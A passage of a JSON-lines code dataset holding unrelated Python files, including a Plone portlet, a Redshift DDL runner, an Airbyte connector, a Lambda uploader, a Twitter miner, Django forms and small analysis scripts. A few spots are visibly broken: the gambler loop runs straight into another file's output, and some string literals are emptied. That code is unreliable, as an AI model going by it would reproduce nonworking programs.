\n This is what is actually managed through the portlets UI and associated\n with columns.\n \"\"\"\n implements(IRollPortlet)\n header = u\"\"\n ajaxsrc = u\"\"\n show_more = True\n topid = u\"\"\n cssid = u\"\"\n roll_direc = \"left\"\n speed = 30\n pause = 1000\n step = 1\n show_text = False\n\n def __init__(self, header=u\"\", ajaxsrc=u\"\", show_more=True,topid=u\"\",\n cssid=u\"\",roll_direc=\"left\",speed=None,pause=None,step=None,show_text=False):\n self.header = header\n self.ajaxsrc = ajaxsrc\n self.show_more = show_more\n self.show_text = show_text\n self.speed = speed\n self.pause = pause\n self.step = step\n self.topid = topid\n self.cssid = cssid\n self.roll_direc = roll_direc\n\n @property\n def title(self):\n \"\"\"This property is used to give the title of the portlet in the\n \"manage portlets\" screen. Here, we use the title that the user gave.\n \"\"\"\n return self.header\n\n\nclass Renderer(base.Renderer):\n \"\"\"Portlet renderer.\n \n This is registered in configure.zcml. The referenced page template is\n rendered, and the implicit variable 'view' will refer to an instance\n of this class. Other methods can be added and referenced in the template.\n \"\"\"\n\n render = ViewPageTemplateFile('rollportlet.pt')\n \n#\n# def __init__(self, *args):\n# base.Renderer.__init__(self, *args)\n \n @memoize\n def render_marqueejs(self):\n cssid = self.data.cssid \n imgsrc = self.data.ajaxsrc\n context = aq_inner(self.context)\n portal_state = getMultiAdapter((context, self.request), name=u'plone_portal_state')\n portal_url = portal_state.portal_url()\n if imgsrc[:4] != 'http':\n imgsrc = portal_url + '/' + imgsrc \n topid = self.data.topid\n if self.data.show_text:\n showtext = 1\n else:\n showtext = 0 \n out=\"\"\"$(document).ready(function(){ajaxfetchimg(\"%(topid)s\",\"%(url)s\",\".%(mid)s\",%(text)s);});\"\"\" % dict(topid=topid,url=imgsrc,mid=cssid,text=showtext)\n return out \n\n \nclass AddForm(base.AddForm):\n \"\"\"Portlet add form.\n \n This is registered in configure.zcml. The form_fields variable tells\n zope.formlib which fields to display. The create() method actually\n constructs the assignment that is being added.\n \"\"\"\n form_fields = form.Fields(IRollPortlet)\n description = _a(u\"This portlet display a listing of items from a Collection.\")\n\n def create(self, data):\n return Assignment(**data)\n\nclass EditForm(base.EditForm):\n \"\"\"Portlet edit form.\n \n This is registered with configure.zcml. 
The form_fields variable tells\n zope.formlib which fields to display.\n \"\"\"\n\n form_fields = form.Fields(IRollPortlet)\n label = _a(u\"Edit Collection Portlet\")\n description = _a(u\"This portlet display a listing of items from a Collection.\")\n","sub_path":"my315ok/portlet/rollitems/rollportlet.py","file_name":"rollportlet.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"571180569","text":"import psycopg2\nimport csv\nimport glob\nimport os\nimport sys\nsys.path.append('/opt/config')\nimport config\n\n\ncon=psycopg2.connect(dbname=config.DB_NAME, host=config.DB_HOST,port=5439,user=config.DB_USER, password=config.DB_PASS)\ncur = con.cursor()\n\ndirs_in_dir = []\nlocation='/home/ec2-user/workspace/analytics_engineering_marts/ddl/deploy'\nprint(location)\n\nfileset = [file for file in glob.glob(location + \"**/*.sql\", recursive=True)]\n\nfor file in fileset:\n f1 = open(file, \"r\")\n query=f1.read()\n sqlCommands = query.split(';')\n for i in sqlCommands:\n print(i)\n cur.execute(i)\n con.commit()\n f1.close()\ncur.close()\n","sub_path":"data_model/ddl/Redshift_ddl/back/pyscript/redshift_execute_ddl_dml.py","file_name":"redshift_execute_ddl_dml.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544155793","text":"#\n# Copyright (c) 2021 Airbyte, Inc., all rights reserved.\n#\n\n\nfrom typing import Any, List, Mapping, Tuple\n\nimport pendulum\nfrom airbyte_cdk.logger import AirbyteLogger\nfrom airbyte_cdk.models import SyncMode\nfrom airbyte_cdk.sources import AbstractSource\nfrom airbyte_cdk.sources.streams import Stream\nfrom source_pipedrive.streams import Activities, ActivityFields, Deals, Leads, Organizations, Persons, Pipelines, Stages, Users\n\n\nclass SourcePipedrive(AbstractSource):\n def check_connection(self, logger: AirbyteLogger, config: Mapping[str, Any]) -> Tuple[bool, Any]:\n try:\n deals = Deals(api_token=config[\"api_token\"], replication_start_date=pendulum.parse(config[\"replication_start_date\"]))\n deals_gen = deals.read_records(sync_mode=SyncMode.full_refresh)\n next(deals_gen)\n return True, None\n except Exception as error:\n return False, f\"Unable to connect to Pipedrive API with the provided credentials - {repr(error)}\"\n\n def streams(self, config: Mapping[str, Any]) -> List[Stream]:\n \"\"\"\n :param config: A Mapping of the user input configuration as defined in the connector spec.\n \"\"\"\n stream_kwargs = {\"api_token\": config[\"api_token\"]}\n incremental_stream_kwargs = {**stream_kwargs, \"replication_start_date\": pendulum.parse(config[\"replication_start_date\"])}\n streams = [\n Activities(**incremental_stream_kwargs),\n ActivityFields(**stream_kwargs),\n Deals(**incremental_stream_kwargs),\n Leads(**stream_kwargs),\n Organizations(**incremental_stream_kwargs),\n Persons(**incremental_stream_kwargs),\n Pipelines(**incremental_stream_kwargs),\n Stages(**incremental_stream_kwargs),\n Users(**incremental_stream_kwargs),\n ]\n return streams\n","sub_path":"airbyte-integrations/connectors/source-pipedrive/source_pipedrive/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"540673959","text":"import json\nimport boto3\ns3 = boto3.client('s3')\n\ndef handler(event, context):\n print('received event:')\n print(event)\n 
print()\n\n accountId = context.invoked_function_arn.split(\":\")[4]\n data = json.loads(event['body'])\n print('data', data)\n s3.put_object(Body=data['template'], Bucket=f\"soardinator-remediation-cfns-{accountId}\", Key=data[\"name\"] + \".yaml\")\n return {\n 'statusCode': 200,\n 'headers': {\n 'Access-Control-Allow-Headers': '*',\n 'Access-Control-Allow-Origin': '*',\n 'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'\n },\n 'body': json.dumps('Uploaded template')\n }","sub_path":"amplify/#current-cloud-backend/function/UploadRemediationTemplate/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"570656744","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/uncompyle6/semantics/customize26_27.py\n# Compiled at: 2020-01-14 12:41:01\n\"\"\"Isolate Python 2.6 and 2.7 version-specific semantic actions here.\n\"\"\"\nfrom uncompyle6.semantics.consts import TABLE_DIRECT\n\ndef customize_for_version26_27(self, version):\n if version > 2.6:\n TABLE_DIRECT.update({'except_cond2': ('%|except %c as %c:\\n', 1, 5), 'call_generator': ('%c%P', 0, (1, -1, ', ', 100))})\n else:\n TABLE_DIRECT.update({'testtrue_then': ('not %p', (0, 22))})\n\n def n_call(node):\n mapping = self._get_mapping(node)\n key = node\n for i in mapping[1:]:\n key = key[i]\n\n if key.kind == 'CALL_FUNCTION_1':\n args_node = node[(-2)]\n if args_node == 'expr':\n n = args_node[0]\n if n == 'generator_exp':\n node.kind = 'call_generator'\n self.default(node)\n\n self.n_call = n_call","sub_path":"pycfiles/uncompyle6-3.6.7-py2.4/customize26_27.py","file_name":"customize26_27.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477875684","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/i3visiotools/darkfy/lib/wrappers/darkengine.py\n# Compiled at: 2014-12-25 06:48:18\nimport os, re, copy, logging, i3visiotools.browser as usufybrowser\n\nclass DarkEngine:\n \"\"\" \n class.\n \"\"\"\n\n def __init__(self):\n \"\"\" \n Constructor without parameters...\n Most of the times, this will be the ONLY method needed to be overwritten.\n \"\"\"\n self.name = ''\n self.url = 'http://example.com/?q=' + ''\n self.delimiters = {}\n self.delimiters['start'] = ''\n self.delimiters['end'] = ''\n self.fields = {}\n\n def __str__(self):\n \"\"\" \n Function to obtain the text that represents this object.\n \n :return: str(self.getJson())\n \"\"\"\n return str(self.name)\n\n def getResults(self, word=None):\n r\"\"\" \n Function to recover the.\n \n :param word: word to be searched.\n\n :return: The output format will be like:\n {\"email\" : {\"reg_exp\" : \"[a-zA-Z0-9\\.\\-]+@[a-zA-Z0-9\\.\\-]+\\.[a-zA-Z]+\" , \"found_exp\" : [\"foo@bar.com\", \"bar@foo.com\"] } }\n \"\"\"\n logger = logging.getLogger('darkfy')\n searchURL = self.url.replace('', word)\n logger.debug('Recovering the targetted url (authenticated)...')\n uBrowser = usufybrowser.Browser()\n html = uBrowser.recoverURL(searchURL)\n start = self.delimiters['start']\n end = self.delimiters['end']\n values = re.findall(start + '(.*?)' + end, html, re.DOTALL)\n 
parsedResults = []\n for val in values:\n newResource = {}\n for field in self.fields.keys():\n foundElems = re.findall(self.fields[field]['start'] + '(.*?)' + self.fields[field]['end'], val, re.DOTALL)\n newResource[field] = self.cleanSpecialChars(foundElems)\n\n parsedResults.append(newResource)\n\n return parsedResults\n\n def cleanSpecialChars(self, auxList):\n \"\"\"\n Method that cleans any text deleting certain special characters and avoiding the text between '<' and '>'.\n \n :param auxList: Any list of strings.\n :return: A cleaned list of strings.\n \"\"\"\n final = []\n cleaningChars = [\n '\\n', '\\t', '\\r']\n for elem in auxList:\n for c in cleaningChars:\n elem = elem.replace(c, '')\n\n elem = re.sub('<.+?>', ' ', elem)\n final.append(elem)\n\n return final","sub_path":"pycfiles/i3visiotools-v0.2.3.linux-i686.tar/darkengine.py","file_name":"darkengine.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"389271598","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = [10,10]\nimport csv\nfrom decimal import Decimal\nimport math\nfrom format import sci_not\n\n\npath = '../Tests/Serial102/'\n#CURRENT\nrange_values=[1,10,100,1000,50e3]\n#range_values=[1]\nave_time='100'\nnum_points=15\nfor arg in sys.argv:\n if arg.split('=')[0]=='path':\n path=arg.split('=')[1]\nprint('Path is set to '+path)\n \nfor range_value in range_values:\n plt.close()\n for channel in range(4):\n x = []\n xo=[]\n y = []\n yo=[]\n dy = []\n dyo=[]\n markers= [',', 'x', '+', 'v','^', '<', '>', 's', 'd']\n line=0\n with open(path+'data/'+ave_time+'ms_current'+str(channel)+'.1.csv','r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n next(csvfile)\n line+=1\n next(csvfile)\n line+=1\n for row in plots:\n if len(row)>1:\n if row[5]=='start':\n input=float(row[0])*(1e6)\n mean=float(row[3])\n std=float(row[4])\n rng=float(row[1])\n if rng == range_value:\n if line%num_points < num_points:\n x.append(input)\n y.append(mean)\n dy.append(std/num_points**0.5)\n if range_value!=50e3:\n if input < range_value:\n xo.append(input)\n yo.append(mean)\n dyo.append(std/num_points**0.5)\n else:\n if input < range_value*0.8:\n xo.append(input)\n yo.append(mean)\n dyo.append(std/num_points**0.5)\n line+=1\n p, c = np.polyfit(xo, yo, 1, w=dyo, cov=True)\n e = np.sqrt(np.diag(c))\n slope=sci_not(p[0],e[0],True)\n offset=sci_not(p[1],e[1],True)\n #print([p[1],e[1]])\n slope_str= '('+str(slope[0])+'\\\\pm'+str(slope[1])+')e'+str(slope[2]) if slope[2] != 0 else str(slope[0])+'\\\\pm'+str(slope[1])\n offset_str= '('+str(offset[0])+'\\\\pm'+str(offset[1])+')e'+str(offset[2]) if offset[2] != 0 else str(offset[0])+'\\\\pm'+str(offset[1])\n med_std=sci_not(dyo[round(len(dyo)/2)]*num_points**0.5,dyo[round(len(dyo)/2)]*num_points**0.5,True)\n std_str= str(med_std[0])+'e'+str(med_std[2]) if med_std[2] != 0 else str(med_std[0])\n if channel!=3:\n print(str(channel)+' & '+str(range_value)+' & $'+slope_str+'$ & $'+offset_str+'$ & '+std_str+' \\\\\\\\ \\\\hline')\n else:\n print(str(channel)+' & '+str(range_value)+' & $'+slope_str+'$ & $'+offset_str+'$ & '+std_str+' \\\\\\\\ \\\\Xhline{3\\\\arrayrulewidth}')\n #\\\\\\\\ \\\\Xhline{3\\\\arrayrulewidth}\n\n slope=sci_not(p[0],e[0])\n offset=sci_not(p[1],e[1])\n\n plt.plot(np.array(x),offset[0]*10**offset[2]+np.array(x)*slope[0]*10**slope[2])\n plt.scatter(x,y, marker=markers[channel],label='channel'+str(channel))\n\n plt.legend()\n 
plt.xlabel('Input (\\u03bcA)')\n plt.ylabel('Measurement (\\u03bcA)')\n plt.title('Ave. Time '+ave_time+'ms, '+'Range '+str(int(range_value)))\n #plt.show()\n plt.savefig(path+'plot/'+ave_time+'ms_range'+str(int(range_value))+'.png')\n","sub_path":"Analysis/current_analysis.py","file_name":"current_analysis.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333630217","text":"import gtk\nimport os\nfrom lxml import etree\nfrom dragSourceEventBox import DragSourceEventBox\nfrom colors2 import colors\nfrom shadow import Shadow\nfrom pythonValue import PythonValue\nfrom elementValue import ElementValue\nfrom expand import Expand\nfrom colorChooserButton import ColorChooserButton\nfrom valueValidator import ValueValidator\n\nclass Line(DragSourceEventBox):\n def __init__(self, manager, parent):\n DragSourceEventBox.__init__(self, self)\n self.manager = manager\n self.parentContainer = parent\n self.lineType = ''\n self.customLine = False #false=can not change hor/ver, True = user can change hor/ver\n tempParent = parent\n while tempParent:\n if type(tempParent).__name__ == 'Container':\n if tempParent.isHBox():\n self.lineType = 'vertical'\n else:\n self.lineType = 'horizontal'\n break\n else:\n tempParent = tempParent.parent\n if self.lineType == '':\n self.lineType = 'horizontal'\n self.customLine = True\n\n self.comboType = gtk.combo_box_new_text()\n self.comboType.append_text('horizontal')\n self.comboType.append_text('vertical')\n\n self.drawArea = None\n self.box = None\n self.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"black\"))\n self.shadow = Shadow(self)\n\n self.eB = gtk.EventBox()\n self.eB.set_border_width(2)\n\n self.createContent()\n self.connect('button-press-event', self.showProperties)\n\n self.eB.add(self.box)\n self.add(self.eB)\n\n if type(self.parentContainer).__name__ == 'Container':\n self.drag_source_set(gtk.gdk.BUTTON1_MASK,[],0)\n self.drag_dest_set(0,[],0)\n self.connect('drag_motion', self.motion_cb)\n self.connect('drag_drop', self.drop_cb)\n\n self.buttonColor = ColorChooserButton(self, 'Select line color')\n\n def createContent(self):\n if self.lineType == 'horizontal':\n self.box = gtk.HBox()\n else:\n self.box = gtk.VBox()\n label = gtk.Label(' Line ')\n self.drawArea = gtk.DrawingArea()\n self.drawArea.connect('expose-event',self.exposeLine)\n\n iconEvent = gtk.EventBox()\n iconEvent.set_border_width(2)\n iconEvent.connect('button-release-event', self.deleteClicked)\n icon = gtk.Image()\n icon.set_from_file(os.path.split(os.path.realpath(__file__))[0]+'/delete.png')\n iconEvent.add(icon)\n\n self.box.pack_start(label,False)\n self.box.pack_start(self.drawArea,False)\n self.box.pack_end(iconEvent,False,True,2)\n\n def exposeLine(self, drawArea, data):\n style = drawArea.get_style()\n gc = style.fg_gc[gtk.STATE_NORMAL]\n gc.set_values(line_style=gtk.gdk.LINE_SOLID)\n gc.set_values(line_width=1)\n tempColor = gc.foreground\n x, y = self.window.get_size()\n if self.buttonColor.color:\n if not self.buttonColor.color.startswith('#'):\n try:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color(self.buttonColor.color))\n except ValueError:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color('#'+self.buttonColor.color))\n else:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color(\"black\"))\n else:\n gc.foreground = drawArea.get_colormap().alloc(gtk.gdk.Color(\"black\"))\n\n if self.lineType == 'horizontal':\n if x-75 < 40:\n x1 = 40\n 
else:\n x1 = x-75\n drawArea.set_size_request(x1, 7)\n x, y = drawArea.window.get_size()\n drawArea.window.draw_line(gc, 0, y/2, x1, y/2)\n else:\n if y-50 < 40:\n y1 = 40\n else:\n y1 = y-50\n drawArea.set_size_request(20, y1)\n x, y = drawArea.window.get_size()\n drawArea.window.draw_line(gc, x/2, 0, x/2, y1)\n gc.foreground = tempColor\n\n def showProperties(self, widget, w):\n if self.manager.lastHighligted:\n self.manager.lastHighligted.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"black\"))\n self.manager.lastHighligted = self\n self.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"green\"))\n box = self.manager.wTree.get_widget('vbox_properties')\n for w in box.children():\n box.remove(w)\n labelType = gtk.Label('Type')\n labelType.set_alignment(0.01, 0.5)\n if self.lineType == 'horizontal':\n self.comboType.set_active(0)\n else:\n self.comboType.set_active(1)\n self.comboType.connect('changed', self.changeLineType)\n\n labelColor = gtk.Label('Line color')\n labelColor.set_alignment(0.01, 0.5)\n hBox = gtk.HBox()\n hBox.pack_start(labelColor,False)\n hBox.pack_end(PythonValue(self,'Line color'),False)\n hBox.pack_end(ElementValue(self,'Line color'),False)\n\n if self.customLine:\n box.pack_start(labelType, False)\n box.pack_start(self.comboType, False)\n box.pack_start(gtk.Label(' '),False)\n box.pack_start(hBox, False)\n box.pack_start(self.buttonColor, False)\n box.pack_start(gtk.Label(' '),False)\n box.pack_start(self.shadow,False)\n box.show_all()\n\n def changeLineType(self, combo):\n self.lineType = combo.get_active_text()\n self.eB.remove(self.box)\n self.createContent()\n self.eB.add(self.box)\n self.show_all()\n\n def deleteClicked(self, widget, w):\n dialog = gtk.MessageDialog(None,0,gtk.MESSAGE_QUESTION,gtk.BUTTONS_YES_NO,'Delete line?')\n response = dialog.run()\n if response == gtk.RESPONSE_YES:\n if self.parentContainer == None:\n self.manager.clearAll()\n else:\n self.parentContainer.deleteChild(self)\n self.manager.clearProperties()\n dialog.destroy()\n\n def setElementValue(self, attrib, value):\n self.buttonColor.color = value\n if value:\n self.buttonColor.set_label(self.buttonColor.color)\n else:\n self.buttonColor.set_label('')\n self.exposeLine(self.drawArea, None)\n\n def colorChanged(self, newColor, attrib):\n if attrib == 'Select line color':\n self.exposeLine(self.drawArea, None)\n\n def getApp(self):\n app = etree.Element('Line')\n if self.lineType != '':\n app.attrib['type'] = self.lineType\n if self.buttonColor.color:\n app.attrib['color'] = self.buttonColor.getColor()\n if self.shadow.padding > 0 or self.shadow.buttonColor.color:\n shadow = self.shadow.getXMLFormat()\n shadow.append(app)\n app = shadow\n return app\n\n def setLineType(self, type):\n self.lineType = type\n if type == 'horizontal':\n self.comboType.set_active(0)\n if type == 'vertical':\n self.comboType.set_active(1)\n self.changeLineType(self.comboType)\n\n @staticmethod\n def validate(element, dataElement):\n color = element.get('color')\n if color:\n if not ValueValidator.validate(color, dataElement):\n return False, 'Unknown element attribute for line color: ' + color\n return True, None\n","sub_path":"plugin/appearance/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":7505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"318103512","text":"import random\ndef gambler(stake,goal,trails):\n bets=0\n win=0\n loss=0\n for i in range(0,51):\n cash=stake\n while(cash>0 and cash [\\x1b[31m%d\\x1b[0m] Tweets...\" % 
result_count)\n print(\" Timeout Requests API... \")\n print(\" \\x1b[31mEsperando...\\x1b[0m 15 min \")\n time.sleep(15 * 60)\n continue\n","sub_path":"Crawler scripts/miner_onlygeo_geo.py","file_name":"miner_onlygeo_geo.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"382289948","text":"# example of program that calculates the average degree of hashtags\nimport json\nimport collections\nfrom datetime import datetime\nimport time\nimport sys\nimport re\n\nclass Socialgraph:\n def __init__(self,fileread,filewrite):\n self.nodeLink = dict() # a 2d dictionary, keys are nodeid, value is time\n self.curtime = 0\n self.fileread = open(fileread, 'r')\n self.filewrite = open(filewrite,'w')\n self.log = collections.deque() # the moving window of {time:hashtags}\n\n def processfile(self):\n for line in self.fileread:\n data = json.loads(line)\n if 'text' in data and 'created_at' in data:\n texttime = data['created_at'].encode('ascii','ignore')\n self.curtime = time.mktime(datetime.strptime(texttime,'%a %b %d %H:%M:%S +0000 %Y').timetuple())\n if \"entities\" in data and \"hashtags\" in data[\"entities\"]:\n taglist = self.extractHashtag(data['entities']['hashtags'])\n else:\n taglist = []\n # taglist = self.extractHashtag(data['text'].encode('ascii','ignore'))\n\n self.log.append({'time': self.curtime,'taglist':taglist})\n self.groupConnect(taglist)\n self.removeLogs()\n self.calAvgDegree()\n\n## Go through the log and disconnect links until curtime-60seconds\n def removeLogs(self):\n while len(self.log) !=0:\n elem = self.log[0]\n if elem['time']= 2:\n for i in xrange(0,length-1):\n for j in xrange(i+1,length):\n if taglist[i]!= taglist[j]:\n self.Connect(taglist[i],taglist[j])\n\n## Disconnect a group of hashtags if the links between them has not been updated for 60 seconds\n def groupDisconnect(self,taglist):\n length = len(taglist)\n if length >= 2:\n for i in xrange(0,length-1):\n for j in xrange(i+1,length):\n if taglist[i]!= taglist[j]:\n self.Disconnect(taglist[i],taglist[j])\n\n# Caluculate the average degree in the social graph\n def calAvgDegree(self):\n if len(self.nodeLink) == 0:\n avgdegree = 0.0\n else:\n sumdegree = 0.0\n for elem in self.nodeLink:\n sumdegree +=len(self.nodeLink[elem])\n avgdegree = sumdegree/len(self.nodeLink)\n self.filewrite.write(\"%.2f\\n\"%avgdegree)\n\n# Connect two hashtags in the social graph\n def Connect(self,word1,word2):\n if word1 not in self.nodeLink:\n self.nodeLink[word1] = {word2:self.curtime}\n else:\n self.nodeLink[word1][word2] = self.curtime\n if word2 not in self.nodeLink:\n self.nodeLink[word2] = {word1:self.curtime}\n else:\n self.nodeLink[word2][word1] = self.curtime\n\n# Disconnect two hashtags in the social graph if the link has not been updated for 60 seconds\n def Disconnect(self,word1,word2):\n if word1 in self.nodeLink:\n if word2 in self.nodeLink[word1] and self.nodeLink[word1][word2]1:\n input = sys.argv[1]\n output = sys.argv[2]\n else:\n input = \"../tweet_input/tweets.txt\"\n output = \"../tweet_output/ft2.txt\"\n sg = Socialgraph(input,output)\n sg.processfile()","sub_path":"src/average_degree.py","file_name":"average_degree.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"169115198","text":"from django import forms\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as 
_\nfrom django.conf import settings\nfrom .models import SolicitudPresupuesto, ModoEnvio, TipoMaterial, TipoTrabajo, Terminacion, \\\n Cliente, MedidaEstandar, Cantidades, ColorImpresion\n\nclass SolicitudPresupuestoForm(forms.ModelForm):\n class Meta:\n model = SolicitudPresupuesto\n fields = ['orientacion', 'doble_cara_impresion',\n 'disenio_incluido', 'terminacion_incluido', 'express', 'comentarios',\n 'url_carpetas_adjuntos', 'color'\n ]\n CHOICES = (('1', 'Si',), ('0', 'No',))\n CHOICES_2 = (('H','Horizontal'), ('V', 'Vertical'))\n\n labels = {\n 'doble_cara_impresion': _('Impresión en ambas caras'),\n 'disenio_incluido': _('Diseño incluído'),\n 'terminacion_incluido': _('Incluye terminaciones'),\n 'express': _('Trabajo express'),\n 'url_carpetas_adjuntos': _('Subir archivo de diseño')\n }\n\n help_texts = {\n 'express': _('Incluye costo adicional. Consulte por más información.'),\n }\n\n widgets = {\n 'disenio_incluido': forms.Select(choices=CHOICES),\n 'terminacion_incluido': forms.Select(choices=CHOICES),\n 'express': forms.Select(choices=CHOICES),\n 'doble_cara_impresion': forms.Select(choices=CHOICES),\n 'orientacion': forms.Select(choices=CHOICES_2),\n 'doble_cara_terminacion': forms.Select(choices=CHOICES),\n 'comentarios': forms.Textarea(attrs={'rows':4, 'cols':30}),\n 'url_carpetas_adjuntos': forms.FileInput(),\n #'color': forms.Select(choices=)\n }\n\n\nclass ModoEnvioForm(forms.ModelForm):\n class Meta:\n model = ModoEnvio\n fields = ['detalle_modo_envio']\n\n widgets={\n 'detalle_modo_envio': forms.Select(choices=((x.id_modo_envio, x.detalle_modo_envio) for x in ModoEnvio.objects.all().order_by('id_modo_envio')))\n }\n\n\nclass TipoMaterialForm(forms.ModelForm):\n class Meta:\n model = TipoMaterial\n\n fields=['nombre_material']\n\n widgets={\n 'nombre_material': forms.Select(choices=((x.id_material, x.nombre_material) for x in TipoMaterial.objects.all().order_by('nombre_material')),)\n }\n\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model=Cliente\n fields=['razon_social', 'tel_1', 'interno_tel_1','tel_2', 'interno_tel_2', 'email_1', 'tipo_doc', 'nro_doc',\n 'contacto_1', 'horario_contacto']\n\n labels = {\n 'razon_social': _('Nombre y Apellido / Razón Social'),\n 'tel_1': _('Teléfono'),\n 'interno_tel_1': _('Interno'),\n 'tel_2': _('Teléfono alternativo'),\n 'interno_tel_2': _('Interno tel alt.'),\n 'email_1': _('Email'),\n 'tipo_doc': _('Tipo de documento'),\n 'nro_doc': _('Nro de documento'),\n 'contacto_1': _('Contacto'),\n }\n\n CHOICES = (('dni', 'DNI',), ('cuit', 'CUIT',),)\n\n widgets = {\n 'tel_1': forms.TextInput(),\n 'interno_tel_1': forms.TextInput(),\n 'tel_2': forms.TextInput(),\n 'interno_tel_2': forms.TextInput(),\n 'tipo_doc': forms.Select(choices=CHOICES)\n }\n error_messages = {\n 'interno_tel_1': {\n 'invalid': _('Sólo números')\n },\n 'interno_tel_2': {\n 'invalid': _('Sólo números')\n },\n }\n\n help_texts = {\n 'nro_doc': _('Sólo números. Sin guiones ni puntos'),\n 'tel_1': _('Sólo números. Sin guiones ni puntos ni paréntesis'),\n 'tel_2': _('Sólo números. Sin guiones ni puntos ni paréntesis'),\n 'interno_tel_1':_('Sólo números'),\n 'interno_tel_2': _('Sólo números'),\n 'razon_social': _('')\n }\n\n def clean_razon_social(self):\n data = self.cleaned_data['razon_social']\n for d in data:\n if not (d.isspace() or d.isalpha()):\n raise ValidationError(_('Nombre inválido. 
No se admiten números ni caracteres especiales'), code='invalid')\n\n return data\n\n def clean_contacto_1(self):\n data = self.cleaned_data['contacto_1']\n if data is not None:\n for d in data:\n if not (d.isspace() or d.isalpha()):\n raise ValidationError(_('Nombre inválido. No se admiten números ni caracteres especiales'), code='invalid')\n\n return data\n\n def clean_tel_1(self):\n data = self.cleaned_data.get('tel_1')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Teléfono inválido. Sólo números'), code='invalid')\n return data\n\n def clean_int_tel_1(self):\n data = self.cleaned_data.get('interno_tel_1')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Interno inválido. Sólo números'), code='invalid')\n return data\n\n def clean_tel_2(self):\n data = self.cleaned_data.get('tel_2')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Teléfono inválido. Sólo números'), code='invalid')\n return data\n\n def clean_int_tel_2(self):\n data = self.cleaned_data.get('interno_tel_2')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Interno inválido. Sólo números'), code='invalid')\n return data\n\n def clean_nro_doc(self):\n tipo_doc = self.cleaned_data.get('tipo_doc')\n data = self.cleaned_data.get('nro_doc')\n if data is not None:\n for d in data:\n if not d.isdigit():\n raise ValidationError(_('Número de documento inválido. Sólo números'), code='invalid')\n elif tipo_doc == 'dni' and len(data) < 7:\n raise ValidationError(_('La longitud del número no es válido'), code='invalid')\n elif tipo_doc == 'cuit' and len(data) != 11:\n raise ValidationError(_('La longitud del número no es válido'), code='invalid')\n return data\n\n\nclass TipoTrabajoForm(forms.ModelForm):\n class Meta:\n model=TipoTrabajo\n fields = ['detalle_tipo_trabajo']\n labels = {\n 'detalle_tipo_trabajo': _('Trabajo')\n }\n widgets = {\n 'detalle_tipo_trabajo': forms.Select(choices=((x.id_tipo_trabajo, x.detalle_tipo_trabajo)for x in TipoTrabajo.objects.all().order_by('detalle_tipo_trabajo')),)\n }\n\n\nclass MedidasForm(forms.Form):\n medidas = forms.ModelChoiceField(queryset=MedidaEstandar.objects.all(), label=\"Medidas estándar (cm)\", required=False,\n empty_label='Seleccione una medida estándar')\n\n\nclass CantidadesForm(forms.ModelForm):\n #flg_terminacion = forms.BooleanField(initial=False, label=\"¿Requiere de terminaciones?\", required=False)\n class Meta:\n model = Cantidades\n fields = ['cantidad']\n labels = {\n 'cantidad': _('Ingrese cantidad')\n }\n widgets = {\n 'cantidad': forms.Select(choices=((x.id_cantidad, str(x.cantidad)) for x in Cantidades.objects.all().order_by('cantidad')))\n }\n","sub_path":"safetag_project/safetag/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"256460265","text":"import sys\nimport json\nMINUS_INFINITY = -float('inf')\n\n# How many INFO log lines are there?\n# How many WARN log lines are there?\n# How many unique sn values are there?\n# How many unique si values are there?\n# What is max value for ss? 
